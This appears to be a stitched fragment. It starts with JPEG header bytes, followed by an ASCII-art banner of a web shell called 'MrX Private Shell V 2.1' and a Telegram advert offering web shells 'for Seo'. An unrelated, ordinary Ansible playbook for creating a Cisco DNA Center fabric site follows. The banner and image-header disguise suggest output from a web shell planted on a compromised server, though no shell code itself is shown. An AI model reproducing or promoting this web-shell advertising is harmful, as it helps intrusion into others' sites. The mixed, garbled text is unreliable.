����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
---
- hosts: dnac_servers
vars_files:
- credentials.yml
gather_facts: false
tasks:
- name: Create
cisco.dnac.sda_fabric_site:
dnac_host: "{{ dnac_host }}"
dnac_username: "{{ dnac_username }}"
dnac_password: "{{ dnac_password }}"
dnac_verify: "{{ dnac_verify }}"
dnac_port: "{{ dnac_port }}"
dnac_version: "{{ dnac_version }}"
dnac_debug: "{{ dnac_debug }}"
state: present
fabricName: DNAC_Guide_Fabric
siteNameHierarchy: Global/San Francisco
# - name: Delete all
# cisco.dnac.sda_fabric_site:
# dnac_host: "{{ dnac_host }}"
# dnac_username: "{{ dnac_username }}"
# dnac_password: "{{ dnac_password }}"
# dnac_verify: "{{ dnac_verify }}"
# dnac_port: "{{ dnac_port }}"
# dnac_version: "{{ dnac_version }}"
# dnac_debug: "{{ dnac_debug }}"
# state: absent
# siteNameHierarchy: Global/San Francisco
# register: result
# - name: Show result
# debug:
# msg: "{{ result }}"
# when:
# - result is defined